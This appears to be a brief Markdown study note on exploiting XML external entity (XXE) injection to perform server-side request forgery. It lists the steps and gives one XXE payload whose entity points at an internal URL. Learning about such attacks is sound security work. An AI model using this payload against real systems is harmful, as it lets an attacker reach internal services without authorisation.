11 lines
289 B
Markdown
11 lines
289 B
Markdown
|
|
||
|
## Exploiting XXE to Perform SSRF Attacks
|
||
|
|
||
|
- Need to do the following:
|
||
|
- Define an external XML entity using the URL you want to target
|
||
|
- Use the defined entity within a data value
|
||
|
|
||
|
```xml
|
||
|
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM " http://internal.vulnerable-
|
||
|
website.com/"> ]>
|
||
|
```
|